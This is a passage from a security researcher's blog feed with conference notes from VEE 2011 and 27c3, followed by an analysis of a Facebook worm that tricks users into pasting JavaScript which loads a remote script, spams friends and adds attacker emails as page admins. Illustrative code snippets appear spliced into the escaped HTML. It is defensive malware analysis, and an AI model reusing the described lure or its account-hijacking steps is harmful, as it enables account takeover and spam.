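The prefetch ordering can be illustrated with a small sketch (my own toy model of working-set restore, not VMware's code): the tracer remembers recently touched pages, and the restore path streams the working set before everything else.

```python
from collections import OrderedDict

class WorkingSetTracker:
    """Toy tracer: remember the most recently touched pages."""
    def __init__(self, capacity=1024):
        self.capacity = capacity
        self.pages = OrderedDict()   # page number -> True, in access order

    def touch(self, page):
        self.pages.pop(page, None)   # move page to most-recent position
        self.pages[page] = True
        if len(self.pages) > self.capacity:
            self.pages.popitem(last=False)   # evict least-recently used

    def restore_order(self, all_pages):
        """Restore working-set pages first (most recent first), then the rest."""
        ws = [p for p in reversed(self.pages)]
        rest = [p for p in all_pages if p not in self.pages]
        return ws + rest
```

Since the VM resumes exactly where the checkpoint was taken, the pages touched just before checkpointing are the ones accessed again first, which is why this ordering avoids lazy-restore thrashing.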
&lt;p&gt;&lt;strong&gt;Fast and Correct Performance Recovery of Operating Systems Using a
Virtual Machine Monitor&lt;/strong&gt;
&lt;em&gt;(Kenichi Kourai, Institute of Technology, Japan)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A reboot is often the only solution to get over a fault in the system.
After a reboot performance is still degraded due to many page misses. A
new form of reboot with a warm page cache is proposed. The page cache is
kept in memory and can be reused after a reboot. A cache consistency
mechanism is added to keep track of the caching information.
Saving a couple of seconds after a reboot leads to constant overhead
during the runtime due to the implementation. Does this really make
sense? Reboots should be infrequent for servers. Does it really make
sense to keep the page cache around?&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="session-4-migration"&gt;
&lt;h2&gt;Session 4: Migration&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Evaluation of Delta Compression techniques for Efficient Live
Migration of Large Virtual Machines&lt;/strong&gt;
&lt;em&gt;(Petter Svard, Benoit Hudzia, Johan Tordsson and Erik Elmroth, Umea
University Sweden)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A problem with current solutions is that more pages can turn dirty than
can be transferred to the other host. At some point the VM is
stopped and the remaining pages are transferred, which leads to a long
downtime. Depending on the transfer link it can make more sense to
compress, transfer, and decompress than to just transfer pages, because
compression and decompression are faster than the transfer of the full
uncompressed page. A special remark is that only pages that were already
transferred are delta-compressed: if a page was already transferred, is in
the cache of the sender, and turns dirty, then the delta is constructed,
compressed, and sent. Otherwise the plain page is sent. Petter did some
live demos.&lt;/p&gt;
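The sender-side logic can be sketched as follows (a simplification of what I understood from the talk; XOR deltas plus zlib stand in for whatever delta encoding and compressor the paper actually uses):

```python
import zlib

PAGE_SIZE = 4096

def encode_page(addr, page, sent_cache):
    """If the page was sent before, send a compressed XOR delta against the
    cached copy; otherwise (or if the delta does not pay off) send it raw."""
    prev = sent_cache.get(addr)
    sent_cache[addr] = page
    if prev is not None:
        delta = bytes(a ^ b for a, b in zip(page, prev))
        comp = zlib.compress(delta)
        if len(comp) < len(page):
            return ('delta', comp)
    return ('raw', page)

def decode_page(addr, kind, payload, recv_cache):
    """Receiver reverses the encoding using its own copy of the page."""
    if kind == 'delta':
        delta = zlib.decompress(payload)
        page = bytes(a ^ b for a, b in zip(delta, recv_cache[addr]))
    else:
        page = payload
    recv_cache[addr] = page
    return page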
&lt;p&gt;&lt;strong&gt;CloudNet: Dynamic Pooling of Cloud Resources by Live WAN Migration of
Virtual Machines (Highlight)&lt;/strong&gt;
&lt;em&gt;(Timothy Wood, KK Ramakrishnan, Prashant Shenoy and Jacobus van der
Merwe)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Problem: cloud resources are isolated from one another and the
enterprise. The interesting question is how to manage these different
isolated machines and how to secure data transfers between the different
machines and across multiple data-centers. Use VPNs to connect different
data centers and use common migration tools.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Workload-Aware Live Storage Migration for Clouds&lt;/strong&gt;
&lt;em&gt;(Jie Zheng, T. S. Eugene Ng and Kunwadee Sripanidkulchai, Rice
University)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Storage migration in a wide-area VM migration contributes the largest
part of the data that needs to be transferred. No shared file storage is
available, so disk image must be synchronized somehow (based on block
migration).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="session-5-security"&gt;
&lt;h2&gt;Session 5: Security&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Patch Auditing in Infrastructure as a Service Clouds (Highlight; Read
paper)&lt;/strong&gt;
&lt;em&gt;(Lionel Litty and David Lie, VMWare / University of Toronto)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Apply your patches! But not everybody does, and even automatic patch
application is not a solution. Monitoring on the OS level is not
continuous or systematic either; different applications have different
update mechanisms. There is a need for a better tool to automate the
update mechanism and to monitor the vulnerable state of systems. Additional
challenges are VMs that might be powered down or unavailable to the
infrastructure administrator. Solution: add patch monitoring to the VMM
infrastructure and report to a central tool. Use the VMM to detect
application updates (binary and text only) and analyze different
patches. Use executable bits to detect all live executed code in the
VM, and check that the executed code is OK.&lt;/p&gt;
&lt;p&gt;Patagonix (only binary code detected) -&amp;gt; P2 (extended executable code
(bash script, python, executable) detected).&lt;/p&gt;
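The check-executed-code-against-known-patches step could be approximated like this (my own sketch of the idea, not Patagonix/P2 code; hashing executable pages against a whitelist is an assumption):

```python
import hashlib

PAGE_SIZE = 4096
known_pages = set()   # hashes of code pages from known (patched) binaries

def register_binary(code):
    """Index the executable pages of a trusted, up-to-date binary."""
    for off in range(0, len(code), PAGE_SIZE):
        page = code[off:off + PAGE_SIZE]
        known_pages.add(hashlib.sha256(page).hexdigest())

def audit_page(page_bytes):
    """A page marked executable in the VM should match some known binary;
    anything else is unidentified (possibly unpatched) code."""
    return hashlib.sha256(page_bytes).hexdigest() in known_pages
```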
&lt;p&gt;&lt;strong&gt;Fine-Grained User-Space Security Through Virtualization&lt;/strong&gt;
&lt;em&gt;(Mathias Payer and Thomas R. Gross, ETH Zurich Switzerland)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;My talk. See &lt;a class="reference external" href="https://nebelwelt.net/publications/files/11VEE.pdf"&gt;my paper&lt;/a&gt; for details.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="session-6-virtualization-techniques"&gt;
&lt;h2&gt;Session 6: Virtualization Techniques&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Minimal-overhead Virtualization of a Large Scale Supercomputer&lt;/strong&gt;
&lt;em&gt;(Jack Lange, Kevin Pedretti, Peter Dinda, Patrick Bridges, Chang Bae,
Philip Soltero and Alexander Merritt, University of Pittsburgh)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Palacios (OS-independent embeddable VMM) and Kitten (lightweight
supercomputing OS) for HPC. Key concepts for minimal overhead
virtualization are that (1)I/O is passed through, e.g., direct I/O
access with no virtualization overhead; (2) virtual paging is optimized
for nested and shadow paging; (3) preemption is controlled to reduce
host OS noise. The VMM trusts the guest (e.g., to do DMA correctly).
Bugs in the guest could bring down the complete system. Symbiotic
virtualization as new approach that uses cooperation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Virtual WiFi: Bring Virtualization from Wired to Wireless
(Highlight)&lt;/strong&gt;
&lt;em&gt;(Lei Xia, Sanjay Kumar, Xue Yang, Praveen Gopalakrishnan, York Liu,
Sebastian Schoenberg and Xingang Guo, Northwestern University)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A new approach to virtualization that enables WiFi virtualization. One
physical WiFi interface is virtualized and can be used in multiple VMs.
The current approach is to virtualize an Ethernet device inside the
GuestVM, which strips all the WiFi functionality. The new approach
virtualizes the complete WiFi functionality in the VM. The same Intel WiFi
driver is used in the GuestVM as is used in the HostVM. Each VM gets its
own vMAC, the HostVM distributes packets according to the vMAC, and all
other capabilities are directly forwarded to the VMs and can be set by the
VMs as well.&lt;/p&gt;
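The HostVM's per-vMAC demultiplexing boils down to a table lookup on the destination MAC (a hypothetical sketch of my own, not the actual implementation):

```python
def dispatch_frame(frame, vmac_table):
    """Route an incoming frame to the VM that owns the destination vMAC;
    frames for unknown MACs stay with the host."""
    dst = bytes(frame[:6])               # destination MAC of the frame
    return vmac_table.get(dst, 'HostVM')
```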
&lt;p&gt;Questions: Promiscuous? Rate limited? Multiple vMACs supported in VM as
well?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;SymCall: Symbiotic Virtualization Through VMM-to-Guest Upcalls&lt;/strong&gt;
&lt;em&gt;(Jack Lange and Peter Dinda)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Semantic gap: semantic information is lost between the HW and the
emulated guest HW, and the guest OS state is unknown to the VMM. Two
approaches to learn about the guest: black box (monitor external guest
interactions) and gray box (reverse engineer guest state).&lt;/p&gt;
&lt;p&gt;Symbiotic virtualization: design both the guest OS and the VMM to
minimize the semantic gap, but also offer a fallback to a black-box guest
OS. SymSpy is a passive interface that uses asynchronous communication to
get information about hidden state, and SymCall uses upcalls into the
guest during exit handling.&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;SymSpy: uses a shared memory page between the OS and the VMM to offer
structured data exchange between VMM and OS&lt;/li&gt;
&lt;li&gt;SymCall: similar to system calls. The VMM requests services from the OS.&lt;/li&gt;
&lt;li&gt;Restrictions: only 1 SymCall active at a time, SymCalls run to
completion (no blocking, no context switches, no exceptions or
interrupts), SymCalls cannot wait on locks (deadlocks).&lt;/li&gt;
&lt;/ul&gt;
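SymSpy-style structured exchange over a shared page might look like this (a hypothetical record layout of my own; the real interface is defined by the symbiotic guest and VMM together):

```python
import struct

# Hypothetical record the guest publishes for the VMM:
# (pid, swapped_pages, flags) at a fixed offset in the shared page
RECORD = struct.Struct('<QQI')

def guest_publish(shared_page, pid, swapped_pages, flags):
    """Guest side: write the record into the shared memory page."""
    RECORD.pack_into(shared_page, 0, pid, swapped_pages, flags)

def vmm_peek(shared_page):
    """VMM side: read the guest's state asynchronously, without an upcall."""
    return RECORD.unpack_from(shared_page, 0)
```

SymCall would add the synchronous direction on top of this: during exit handling the VMM invokes a registered guest entry point and waits for it to run to completion.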
&lt;p&gt;SwapBypass is an optimization that pushes swapping from the guest to the
VMM. SwapBypass uses a shadow copy of the page tables of the guest VM.
The VM does not swap out any pages; caching/swapping only happens in
the VMM but never in the guest VM, to reduce I/O pollution. Page faults
are handled in the VMM and not in the guest.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="session-7-memory-management"&gt;
&lt;h2&gt;Session 7: Memory Management&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Overdriver: Handling Memory Overload in an Oversubscribed Cloud
(Highlight)&lt;/strong&gt;
&lt;em&gt;(Dan Williams, Hani Jamjoom, Yew-Huey Liu and Hakim Weatherspoon,
Cornell University)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Peak loads are very rare and utilization in data centers is below 15%.
On the other hand, peak loads are unpredictable and oversubscription
can lead to overload. Memory oversubscription is especially critical
because overload carries a high penalty due to swapping costs. The focus
of this work is to research whether the performance degradation due to
memory overload can be managed, reduced, or eliminated.&lt;/p&gt;
&lt;p&gt;Analysis of different memory overloads shows that most overload is
transient (96% are less than 1min), some overload is sustained (2% last
longer than 10min). Two techniques used to address memory overload: VM
migration (migrates VM to another machine), and network memory that
sends swapped pages not to disk but to another swapping machine over the
network. Network Memory may be used for transient overloads and VM
migration for sustained overloads.&lt;/p&gt;
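The transient-vs-sustained split suggests a simple policy sketch (my own toy model, with a hypothetical 10-minute threshold motivated by the measurement that only 2% of overloads last longer than 10 minutes):

```python
class OverloadMonitor:
    """Pick a mitigation based on how long a VM has been swapping."""
    def __init__(self, sustained_after=600):      # threshold in seconds
        self.sustained_after = sustained_after
        self.overload_start = None

    def sample(self, now, is_swapping):
        if not is_swapping:
            self.overload_start = None            # overload ended
            return 'none'
        if self.overload_start is None:
            self.overload_start = now             # overload begins
        if now - self.overload_start >= self.sustained_after:
            return 'migrate'           # sustained overload -> VM migration
        return 'network_memory'        # transient overload -> remote swap
```

OverDriver's actual decision uses per-VM overload profiles rather than a single fixed threshold, which is exactly what the "adaptive checks" question above is poking at.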
&lt;p&gt;OverDriver uses network memory and VM migration to handle overload.
OverDriver collects swap/overload statistics for each VM and uses overload
profiles to decide when to switch from network memory to VM migration.
Question: The decision on when to migrate is static; what about adaptive
checks/analysis for migration? What other predictors could you use?
(Sounds like future work.)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Selective Hardware/Software Memory Virtualization&lt;/strong&gt;
&lt;em&gt;(Xiaolin Wang, Jiarui Zang, Zhenlin Wang, Yingwei Luo and Xiaoming Li,
Peking University)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;There are three possibilities for memory virtualization: MMU
para-virtualization, shadow page tables, and EPT/NPT. Idea: use dynamic
switching between hardware-assisted paging and shadow paging. Question:
how and when to switch?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Hybrid Binary Rewriting for Memory Access Instrumentation (Highlight;
Read paper)&lt;/strong&gt;
&lt;em&gt;(Amitabha Roy, Steven Hand and Tim Harris, University of Cambridge UK)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Scaling inside multi-threaded shared memory programs can be problematic
(scalability, races, atomicity violations). The goal is to run existing
x86 binaries and analyze synchronization primitives (locks). Dynamic
binary rewriting is used to analyze lock primitives.&lt;/p&gt;
&lt;p&gt;It is hard to decide statically if a lock is taken or not: the result is
either overinstrumentation or unsoundness, therefore dynamic BT is needed.
Hybrid binary rewriting uses static binary rewriting with dynamic binary
rewriting as a fallback. A persistent instrumentation cache (PIC) is
stored between different runs of the same program, so the translated
code can be reused.&lt;/p&gt;
&lt;p&gt;HBR used for two case-studies:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;Profiling: interested in understanding how suitable programs are for
applying STM transformations.&lt;/li&gt;
&lt;li&gt;Speculative lock elision: remove locks and turn them into stm_start,
stm_commit, and instrument reads and writes. STAMP is used to evaluate
this dynamic instrumentation. The problem is that STAMP uses private data
that is accessed inside transactions, and there is manual optimization
for STMs that gets rid of the additional read and write operations.
Dynamic instrumentation instruments all reads and writes and has bad
performance for these cases. Private data tracking uses special
tracking of private data to reduce the amount of instrumentation and
reduces the overhead to reasonable numbers.&lt;/li&gt;
&lt;/ol&gt;
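The lock-to-transaction rewrite can be illustrated with a toy buffered-write "STM" (purely illustrative and of my own making; the real system instruments x86 reads and writes and uses a production STM with conflict detection):

```python
class Txn:
    """Toy transaction: reads see buffered writes, writes are deferred
    until commit. read/write stand in for instrumented stm_read/stm_write."""
    def __init__(self, memory):
        self.memory = memory
        self.writes = {}

    def read(self, addr):
        return self.writes.get(addr, self.memory.get(addr, 0))

    def write(self, addr, value):
        self.writes[addr] = value          # buffered, not yet visible

    def commit(self):
        self.memory.update(self.writes)    # publish all writes at once

# lock(l); x += 1; unlock(l)   becomes roughly:
def elided_increment(memory, addr):
    txn = Txn(memory)                      # stm_start
    txn.write(addr, txn.read(addr) + 1)    # instrumented accesses
    txn.commit()                           # stm_commit
```

Private data tracking would skip instrumenting accesses that are provably thread-local, which is where the STAMP overhead mentioned above comes from.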
&lt;p&gt;Question: Static binary rewriting has no runtime overhead (no translation
overhead), but there can be artifacts/overhead through the translation
process. The translation overhead for DBT is &amp;lt;1%. What about hierarchical
transactions?&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="peek-into-the-future"&gt;
&lt;h2&gt;Peek into the future:&lt;/h2&gt;
&lt;p&gt;VEE 2012 will be in London, UK, general chair will be Steve Hand. VEE'12
is colocated with ASPLOS again, Saturday 3rd of March and Sunday 4th of
March.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="conference"></category><category term="fastBT"></category><category term="acm"></category><category term="vee"></category><category term="libdetox"></category></entry><entry><title>27c3 - 27th Chaos Communication Congress in Berlin (2010-12-27 to 2010-12-30)</title><link href="/blog/2011/0228-27c3-27th-chaos-communication-congress.html" rel="alternate"></link><published>2011-02-28T10:08:00-05:00</published><updated>2011-02-28T10:08:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2011-02-28:/blog/2011/0228-27c3-27th-chaos-communication-congress.html</id><summary type="html">&lt;p&gt;For the 7th time in a row Stormbringer and I visited the Chaos
Communication Conference in Berlin. It was fun as always, I had my
second talk about &lt;a class="reference external" href="https://nebelwelt.net/publications/files/10CCC.pdf"&gt;libdetox&lt;/a&gt; and we were able to drink many beers and I
also listened to some interesting talks. A writeup about the different …&lt;/p&gt;</summary><content type="html">&lt;p&gt;For the 7th time in a row Stormbringer and I visited the Chaos
Communication Conference in Berlin. It was fun as always, I had my
second talk about &lt;a class="reference external" href="https://nebelwelt.net/publications/files/10CCC.pdf"&gt;libdetox&lt;/a&gt; and we were able to drink many beers and I
also listened to some interesting talks. A writeup about the different
talks follows:&lt;/p&gt;
&lt;div class="section" id="day-1"&gt;
&lt;h2&gt;Day 1&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Rop Gongrijp: 27C3 Keynote - We come in Peace&lt;/strong&gt;
Rop talks about Wikileaks, free speech, journalism and how unhappy
people can be used to change the world. An angry energy is needed to
change something. Although we come in peace it is important to use our
unhappiness to change something.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Branko Spasojevic: Code deobfuscation by optimization&lt;/strong&gt;
Static binary translation is used to remove obfuscation. Basic blocks
are merged and false conditional jumps are removed using static flag
tracking. This approach is very limited as no dynamic data is checked.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Dominik Herrmann lexi: Contemporary Profiling of Web Users - On Using
Anonymizers and Still Get Fucked&lt;/strong&gt;
Distinguish individual anonymized web users using the set of hosts they
access. Use machine learning and patterns to differentiate between
individual users. Find bots that access weird patterns. Solution to hide
from these analyses: Use additional background web-traffic that
obfuscates real traffic.&lt;/p&gt;
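The linking step is essentially set similarity over visited hosts; a minimal sketch (my own, the talk's actual features and classifier are more elaborate):

```python
def jaccard(a, b):
    """Similarity of two host sets."""
    return len(a & b) / len(a | b) if a | b else 0.0

def link_session(profiles, session_hosts):
    """Attribute an anonymized session to the user whose known host set
    is most similar -- which is why random background traffic helps."""
    return max(profiles, key=lambda user: jaccard(profiles[user], session_hosts))
```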
&lt;p&gt;&lt;strong&gt;Felix Gröbert: Automatic Identification of Cryptographic Primitives in
Software&lt;/strong&gt;
Use PIN on Windows to analyze malware and automatically find crypto
blocks inside the application. Generate an execution trace with all
executed instructions. Categorize cryptographic algorithms and select
instruction combinations that are used by these algorithms. Search for
these instructions, search for loops, and categorize the crypto.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Collin Mulliner Nico Golde: SMS-o-Death - From analyzing to attacking
mobile phones on a large scale.&lt;/strong&gt;
Get large collection of phones, get baseband station, get a faraday cage
and start fuzzing SMS to kill phones.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Peter Stuge: USB and libusb - So much more than a serial port with
power&lt;/strong&gt;
How to handle USB devices and how to use libUSB. New findings for USB1 /
2 / 3&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;vanHauser: Recent advances in IPv6 insecurities&lt;/strong&gt;
&lt;strong&gt;Bruce Dang Peter Ferrie: Adventures in analyzing Stuxnet&lt;/strong&gt;
A Microsoft-take on analyzing malware. Insights into the structure of
malware decompilation. Description of all the 0day exploits used in
Stuxnet. (And yes, the exploits are really embarrassing for Microsoft).
Great talk!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Alien8 Astro: Pentanews Game Show - Your opponents will be riddled as
well&lt;/strong&gt;
Game show with nerd questions. Most of them too easy.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-2"&gt;
&lt;h2&gt;Day 2&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Michael Steil: Reverse Engineering the MOS 6502 CPU - 3510 transistors
in 60 minutes&lt;/strong&gt;
Interesting talk about the MOS 6502 CPU (used in Nintendos, Apple II and
so on).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Karsten Nohl Sylvain Munaut: Wideband GSM Sniffing&lt;/strong&gt;
Use super cheap mobile phones (4 of them) to sniff GSM communications.
Use SMS routing information to get the location of the target phone, find
the cell, get close to the target phone (into the same cell), recover the
TMSI (the temporary subscriber identity), wait for a call, and decrypt
the call using rainbow tables. BAM, cheap surveillance.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Karsten Becker Robert Boehme: Part-Time Scientists - One year of
Rocket Science!&lt;/strong&gt;
Nerds trying to get to the moon. They already built the rover and are
now building the lander. Nice pictures and some information about how to
get to the moon and what to do if you are only a part-time scientist.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;FX of Phenoelit: Building Custom Disassemblers - Instruction Set
Reverse Engineering&lt;/strong&gt;
Inside of the Stuxnet code there was a lot of SS7 code that is used for
Siemens Controllers. FX developed a disassembler for these machine codes
using a free version of the Siemens compilers. He reverse engineered the
complete tool-chain and verified that parts of the code were
disassembled correctly. He also showed bugs in the Siemens disassemblers
and how to hide hand-written code from the Siemens disassemblers.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Andreas Bogk: Defense is not dead - Why we will have more secure
computers - tomorrow&lt;/strong&gt;
Talks about the SAFE computer of the DoD. Use type-safe languages with a
garbage collector to reduce bugs. Use type-checking and type-guarantees
even on operating-system level. Construct additional hardware that
type-checks all objects as well.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Daniel J. Bernstein: High-speed high-security cryptography: encrypting
and authenticating the whole Internet&lt;/strong&gt;
Get rid of DNSSEC and encrypt every single communication. Use UDP
instead of TCP and move everything to a secure protocol. New protocol,
new form of DNS, view from the perspective of a cryptographer.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ralf-Philipp Weinmann: The Baseband Apocalypse - all your baseband are
belong to us&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ralf-Philipp Weinmann: The Hidden Nemesis - Backdooring Embedded
Controllers&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-3"&gt;
&lt;h2&gt;Day 3&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;bushing marcan sven: Console Hacking 2010 - PS3 Epic Fail&lt;/strong&gt;
How to hack secure crypto systems and how to break the chain of trust
by finding bugs in console software. They had a couple of nice exploits
to get around the software security system of modern consoles and showed
how they could install and develop homebrew software on modern PS3
consoles.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Henryk Plötz Milosch Meriac: Analyzing a modern cryptographic RFID
system - HID iClass demystified&lt;/strong&gt;
Use old legacy information about RFID to crack the new cards. Use holes
in crypto systems or wrong implementations to escalate privileges.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Harald Welte Steve Markgraf: Running your own GSM stack on a phone -
Introducing Project OsmocomBB&lt;/strong&gt;
Get old and cheap phones, crack level 1 software and use a serial line
to control the phone. Implement 2nd, 3rd, and higher levels in software.
Make calls and send texts in a complete open-source and free
implementation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Steven J. Murdoch: Chip and PIN is Broken - Vulnerabilities in the EMV
Protocol&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Harald Welte: Reverse Engineering a real-world RFID payment system -
Corporations enabling citizens to print digital money&lt;/strong&gt;
Free money in Taiwan. They use the Mifare system for public transport
and for small payments. They use a card-only validation scheme that
relies on the security of the card only. All state is saved on the
customer card. Generate your own card with your individual amount of
money on that card. Get free stuff.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Felix von Leitner Frank Rieger: Fnord-Jahresrückblick 2010 - von
Atomausstieg bis Zwangsintegration&lt;/strong&gt;
Brilliant as always. A fun review of the year.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Damien Millescamps Julien Vanegue: Zero-sized heap allocations
vulnerability analysis - Applications of theorem proving for securing
the windows kernel&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ray Stefan 'Sec' Zehl: Hacker Jeopardy - Number guessing for geeks&lt;/strong&gt;
Fun as always :)&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Juergen Pabel: FrozenCache - Mitigating cold-boot attacks for
Full-Disk-Encryption software&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="day-4"&gt;
&lt;h2&gt;Day 4&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Julia Wolf: OMG WTF PDF - What you didn't know about Acrobat&lt;/strong&gt;
Security holes in the PDF parser. Find problems and discrepancies in
different PDF parsers. A PDF can be hidden in a ZIP that can be hidden
in an EXE file. Stack different types and get around the protection of
AV products.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;maha/Martin Haase: Ich sehe nicht, dass wir nicht zustimmen werden -
Die Sprache des politischen Verrats und seiner Rechtfertigung&lt;/strong&gt;
Stylistic tricks involving language, politics, and context.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sergey: Hackers and Computer Science&lt;/strong&gt;
Sergey talks about the hacker culture and hacker ethics in general. Nice
easy-listening talk about the nerd/hacker culture.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;kornau: A framework for automated architecture-independent gadget
search - CCC edition&lt;/strong&gt;
Automatically find gadgets in programs for return-to-libc attacks. The
tool finds function tails that can be used as gadgets. It also checks
half-instructions (e.g., jumping into the middle of an instruction to get
a different, unintended instruction).&lt;/p&gt;
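For x86, the half-instruction trick falls out of scanning backwards from every ret byte (0xC3); a minimal byte-level sketch (mine, far simpler than the talk's architecture-independent framework, and without any disassembly validation):

```python
RET = 0xC3
MAX_TAIL = 5   # assumed maximum gadget length in bytes

def find_gadget_tails(code):
    """Return (offset, bytes) pairs ending in ret, including offsets that
    fall inside the middle of intended instructions (unintended gadgets)."""
    gadgets = []
    for i, b in enumerate(code):
        if b == RET:
            for start in range(max(0, i - MAX_TAIL), i):
                gadgets.append((start, bytes(code[start:i + 1])))
    return gadgets
```

A real gadget finder would then disassemble each candidate tail and keep only sequences that decode to useful, side-effect-controlled instructions.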
&lt;p&gt;&lt;strong&gt;Lars Weiler: Data Analysis in Terabit Ethernet Traffic - Solutions for
monitoring and lawful interception within a lot of bits&lt;/strong&gt;
Product show of different black boxes. Connect multiple network ports to
black boxes. Black boxes filter and drop lots of traffic. Remaining data
can be analyzed by normal PC / analysis machine.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="conference"></category><category term="ccc"></category><category term="security"></category><category term="hacking"></category><category term="27c3"></category></entry><entry><title>The fbviews.org worm or how to collect user data and make money</title><link href="/blog/2011/0221-the-fbviewsorg-worm-or-how-to-collect-user-data-and-make-money.html" rel="alternate"></link><published>2011-02-21T14:04:00-05:00</published><updated>2011-02-21T14:04:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2011-02-21:/blog/2011/0221-the-fbviewsorg-worm-or-how-to-collect-user-data-and-make-money.html</id><summary type="html">&lt;p&gt;A couple of hours ago I read a post from a friend on Facebook that said
&amp;quot;Secret tool shows who stalks your pics&amp;quot;. The text was followed by a
shortened link (tweet, anyone?).
As I opened the link (in an incognito browser window of course) I was
greeted by instructions …&lt;/p&gt;</summary><content type="html">&lt;p&gt;A couple of hours ago I read a post from a friend on Facebook that said
&amp;quot;Secret tool shows who stalks your pics&amp;quot;. The text was followed by a
shortened link (tweet, anyone?).
As I opened the link (in an incognito browser window of course) I was
greeted by instructions to copy some JavaScript code into my address
bar.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2011/0221/stalker.jpg" style="width: 600px;" /&gt;&lt;/p&gt;
&lt;p&gt;Hm, this smells phishy...
The JavaScript that one has to copy into the address bar creates a script
element that downloads a JavaScript file from some drop box and executes
it.&amp;nbsp;So the next thing I did was to download the script.
The script was (somewhat) obfuscated: many/most function names
were replaced with array accesses, and all strings used in the code were
placed in the same array, stored as raw hex values. So I
decoded the values and de-obfuscated the JavaScript.
The JavaScript does the following:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Displays a nice message that it is analyzing your profile (and your
stalkers)&lt;/li&gt;
&lt;li&gt;Posts a (spam) message to your wall (with a random message and a link to
the tool)&lt;/li&gt;
&lt;li&gt;Adds you to the group &amp;quot;Music Makes me High.&amp;quot; (127901437283104)&lt;/li&gt;
&lt;li&gt;Adds you to the group &amp;quot;I Hate it when I can't fall asleep because I'm
thinking.&amp;quot; (165991450116555)&lt;/li&gt;
&lt;li&gt;Adds you to the event with the number&amp;nbsp;168046893242650 (I was
unable to access this event - it might have been deleted)&lt;/li&gt;
&lt;li&gt;Finds 15 of your friends and posts a (spam) message to their wall
(another random message)&lt;/li&gt;
&lt;li&gt;Checks all your registered entries/pages for &amp;quot;Facebook Insights&amp;quot; and
(i) adds two new admin email addresses (lethaburbach890 AT yahoo.com and
wintersaccohoqr AT hotmail.com)
(ii) writes a (spam) message to the wall of the page&lt;/li&gt;
&lt;li&gt;Redirects you to a page that shows some fake results and tries to get
you to fill out some &amp;quot;Human Verification tests&amp;quot;.
I assume that's where they make the money.&lt;/li&gt;
&lt;/ul&gt;
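&lt;p&gt;To illustrate the obfuscation scheme described above: all strings live in
one array of raw hex values, and the code references them by index instead of
by name. The following is a hedged sketch with made-up sample values, not the
worm's actual code; a short decoder like this recovers the strings:&lt;/p&gt;

```javascript
// Sketch of the string-array obfuscation described above.
// The hex values below are hypothetical samples, not taken from the worm.
function decodeHex(h) {
  // split the hex string into byte pairs and map each pair to a character
  return h.match(/.{2}/g).map(function (b) {
    return String.fromCharCode(parseInt(b, 16));
  }).join("");
}

var table = ["616c657274", "7374616c6b6572"].map(decodeHex);
// table is now ["alert", "stalker"]; obfuscated code would then call
// e.g. window[table[0]](...) instead of alert(...)
```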
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2011/0221/stalker2.jpg" style="width: 600px;" /&gt;&lt;/p&gt;
